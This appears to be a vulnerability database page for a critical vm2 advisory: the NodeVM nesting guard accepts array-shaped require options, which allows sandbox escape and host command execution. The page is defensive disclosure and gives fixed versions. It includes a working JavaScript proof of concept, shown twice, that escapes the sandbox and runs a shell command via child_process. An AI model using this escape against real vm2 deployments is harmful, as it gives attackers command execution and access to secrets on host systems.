GHSA-8HR7-R645-PC6W
Vulnerability from github – Published: 2026-10-01 15:34 – Updated: 2026-10-01 15:34Summary
The NodeVM constructor computes hasRealRequireConfig using typeof requireOpts === 'object' && requireOpts !== null, so require: [] bypasses the guard intended to reject nesting without an explicit require configuration. makeResolverFromLegacyOptions() then destructures the array to undefined option fields and returns a resolver containing only NESTING_OVERRIDE.vm2. Any attacker whose JavaScript is executed by a downstream NodeVM configured with {nesting: true, require: []} can load the host vm2 module, create an inner NodeVM with an attacker-selected builtin allowlist, and execute commands as the host process. No equivalent plain-object validation exists in makeResolverFromLegacyOptions().
Array is converted into the vm2-only resolver: https://github.com/patriksimek/vm2/blob/54b54b74a382577f0bcd0538c5bf99acdcd7f53b/lib/resolver-compat.js#L205-L226
Nesting loader returns the host VM constructors: https://github.com/patriksimek/vm2/blob/54b54b74a382577f0bcd0538c5bf99acdcd7f53b/lib/nodevm.js#L640-L645
Proof of Concept
Preconditions:
- The host creates
NodeVMwith truthynestingand array-shapedrequire. - The attacker can supply JavaScript executed by that
NodeVM.
'use strict';
const {NodeVM} = require('./index.js');
const outer = new NodeVM({nesting: true, require: []});
const result = outer.run(`
const {NodeVM} = require('vm2');
const inner = new NodeVM({require: {builtin: ['child_process']}});
module.exports = inner.run(
"module.exports = require('child_process').execSync('id').toString()"
);
`);
console.log(result);
uid=1000(lohar) gid=1000(lohar) groups=1000(lohar)
The hasRealRequireConfig guard fails open because it returns true for arrays, although arrays are not VMRequire configuration objects. makeResolverFromLegacyOptions() applies object destructuring to the array, obtains undefined builtin and external values, merges NESTING_OVERRIDE, and returns before any external-module control is relevant. Outer builtin restrictions do not constrain the attacker-created inner NodeVM, whose require configuration is selected inside the sandbox.
Failed shape check: https://github.com/patriksimek/vm2/blob/54b54b74a382577f0bcd0538c5bf99acdcd7f53b/lib/nodevm.js#L304-L307
Impact
An attacker can execute arbitrary commands with the host Node.js process privileges, including reading secrets, modifying files, and accessing the host network. GHSA-m4wx-m65x-ghrr covers the same nesting primitive but does not cover array-shaped require values and incorrectly identifies 3.11.4 as patched.
Exploitation is limited to downstream applications that enable
nestingand pass the malformed array configuration.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.11.6"
},
"package": {
"ecosystem": "npm",
"name": "vm2"
},
"ranges": [
{
"events": [
{
"introduced": "3.11.4"
},
{
"fixed": "3.11.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-92935"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2026-10-01T15:34:58Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "## Summary\n\nThe `NodeVM` constructor computes `hasRealRequireConfig` using `typeof requireOpts === \u0027object\u0027 \u0026\u0026 requireOpts !== null`, so `require: []` bypasses the guard intended to reject `nesting` without an explicit require configuration. `makeResolverFromLegacyOptions()` then destructures the array to undefined option fields and returns a resolver containing only `NESTING_OVERRIDE.vm2`. Any attacker whose JavaScript is executed by a downstream `NodeVM` configured with `{nesting: true, require: []}` can load the host `vm2` module, create an inner `NodeVM` with an attacker-selected builtin allowlist, and execute commands as the host process. No equivalent plain-object validation exists in `makeResolverFromLegacyOptions()`.\n\nArray is converted into the vm2-only resolver:\nhttps://github.com/patriksimek/vm2/blob/54b54b74a382577f0bcd0538c5bf99acdcd7f53b/lib/resolver-compat.js#L205-L226\n\nNesting loader returns the host VM constructors:\nhttps://github.com/patriksimek/vm2/blob/54b54b74a382577f0bcd0538c5bf99acdcd7f53b/lib/nodevm.js#L640-L645\n\n## Proof of Concept\n\nPreconditions:\n\n- The host creates `NodeVM` with truthy `nesting` and array-shaped `require`.\n- The attacker can supply JavaScript executed by that `NodeVM`.\n\n```javascript\n\u0027use strict\u0027;\n\nconst {NodeVM} = require(\u0027./index.js\u0027);\n\nconst outer = new NodeVM({nesting: true, require: []});\nconst result = outer.run(`\n\tconst {NodeVM} = require(\u0027vm2\u0027);\n\tconst inner = new NodeVM({require: {builtin: [\u0027child_process\u0027]}});\n\tmodule.exports = inner.run(\n\t\t\"module.exports = require(\u0027child_process\u0027).execSync(\u0027id\u0027).toString()\"\n\t);\n`);\n\nconsole.log(result);\n```\n\n```text\nuid=1000(lohar) gid=1000(lohar) groups=1000(lohar)\n```\n\nThe `hasRealRequireConfig` guard fails open because it returns `true` for arrays, although arrays are not `VMRequire` configuration objects. `makeResolverFromLegacyOptions()` applies object destructuring to the array, obtains undefined `builtin` and `external` values, merges `NESTING_OVERRIDE`, and returns before any external-module control is relevant. Outer builtin restrictions do not constrain the attacker-created inner `NodeVM`, whose `require` configuration is selected inside the sandbox.\n\nFailed shape check:\nhttps://github.com/patriksimek/vm2/blob/54b54b74a382577f0bcd0538c5bf99acdcd7f53b/lib/nodevm.js#L304-L307\n\n## Impact\n\nAn attacker can execute arbitrary commands with the host Node.js process privileges, including reading secrets, modifying files, and accessing the host network. GHSA-m4wx-m65x-ghrr covers the same nesting primitive but does not cover array-shaped `require` values and incorrectly identifies 3.11.4 as patched. \n\n\u003e Exploitation is limited to downstream applications that enable `nesting` and pass the malformed array configuration.",
"id": "GHSA-8hr7-r645-pc6w",
"modified": "2026-10-01T15:34:58Z",
"published": "2026-10-01T15:34:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-8hr7-r645-pc6w"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-92935"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/commit/05894eca1dc6a2b1a986f312c88255288a983d22"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/commit/54b54b74a382577f0bcd0538c5bf99acdcd7f53b"
},
{
"type": "PACKAGE",
"url": "https://github.com/patriksimek/vm2"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.7"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/vm2-nodevm-remote-code-execution-via-array-shaped-require"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "vm2: NodeVM nesting guard accepts array-shaped require and permits host RCE"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
The approach is described in our paper Mapping CVEs to MITRE ATT&CK Techniques: A Curated Gold-Set Classifier and the Limits of LLM-Assisted Label Expansion.
Browse all ATT&CK techniques and the vulnerabilities related to each.
Related by attack behaviour
Vulnerabilities whose description is nearest to this one in the vector space of the CIRCL/vulnerability-attack-technique-biencoder model. This is a similarity search over the bi-encoder space (plain cosine), not a classification, and it has no measured accuracy.